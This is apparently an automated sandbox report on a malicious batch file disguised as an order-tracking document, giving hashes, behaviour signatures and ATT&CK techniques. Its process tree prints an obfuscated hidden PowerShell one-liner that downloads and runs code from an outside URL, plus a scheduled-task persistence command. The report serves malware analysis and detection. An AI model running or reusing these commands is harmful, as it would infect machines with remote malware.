4d634f419ee6d84324dccb8c2bbe3ed583220a676c92b1facf34bc749b4a9712

Resubmissions

11/09/2022, 02:28

220911-cxzvkaefcm 8

10/09/2022, 15:56

220910-tdcdlaach5 10

Analysis

max time kernel
91s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
11/09/2022, 02:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TRACK-ORDER#114-85737.bat
Size

65KB
MD5

44d81d1aecc0e4b0aa0f9ad726a02e99
SHA1

eebf5c17f72ee3a323619f45dd1db9d03a417c37
SHA256

4d634f419ee6d84324dccb8c2bbe3ed583220a676c92b1facf34bc749b4a9712
SHA512

6aff752752bdc92478e336c4e71e6d77ada065a76e255e84070834bcdcca52d296cc22d7f778d1dd1cc859b31716fb5a08325977cda550d2ab5da6d490121cb2
SSDEEP

192:nyj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj/:4

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	2648	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3800	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2648	powershell.exe
2648	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2648	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 4936 wrote to memory of 3464	4936	cmd.exe	83
PID 4936 wrote to memory of 3464	4936	cmd.exe	83
PID 3464 wrote to memory of 2648	3464	cmd.exe	84
PID 3464 wrote to memory of 2648	3464	cmd.exe	84
PID 2648 wrote to memory of 4664	2648	powershell.exe	96
PID 2648 wrote to memory of 4664	2648	powershell.exe	96
PID 4664 wrote to memory of 3932	4664	WScript.exe	98
PID 4664 wrote to memory of 3932	4664	WScript.exe	98
PID 3932 wrote to memory of 3800	3932	cmd.exe	100
PID 3932 wrote to memory of 3800	3932	cmd.exe	100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TRACK-ORDER#114-85737.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4936
- C:\Windows\system32\cmd.exe
  CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3464
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)
    3⤵
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2648
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Not\xx.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4664
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Not\xx.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3932
      - C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /tn App /sc minute /mo 3 /tr "C:\ProgramData\Not\Bin.vbs"
        6⤵
        Creates scheduled task(s)
        
        PID:3800

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Not\xx.bat

Filesize
81B

MD5
bed7fd2f5fc7183c0a509fc8f9d48ec9

SHA1
460dd3af5d3010be510b5593ba8740912c92fc85

SHA256
2f80e6b366b6a89a4e28234ab02f4bbc2232c899e5f1f167900567972c9589c2

SHA512
4c377cb0892eae4a003005f0b4bc081dd5f5a519cb662ab8dab9e2446d22a357a3774824e4c7d3613031a9a10dc061f79371c15510deabd21b8a80ff14f41445

Download Submit
C:\ProgramData\Not\xx.vbs

Filesize
169B

MD5
192a7c188e6ede340bdb4d518a4ed036

SHA1
141a993b91c38b734579427b815df181a0ee3cb1

SHA256
5e8c30a0ac20a2cac5e482a59ccbf94d9ac470034a4ef6cba58740d5056b7466

SHA512
3b7d1d75f665604896751036966d296558e2e11151c0de83cc079dda069d8f560cd0f0bd623c08ab09a466fadbc0d91d8e577dc3c32613fc9e2c807a023e1f3e

Download Submit
memory/2648-134-0x0000028F6DB20000-0x0000028F6DB42000-memory.dmp

Filesize
136KB

Download
memory/2648-135-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmp

Filesize
10.8MB

Download
memory/2648-136-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmp

Filesize
10.8MB

Download
memory/2648-139-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmp

Filesize
10.8MB

Download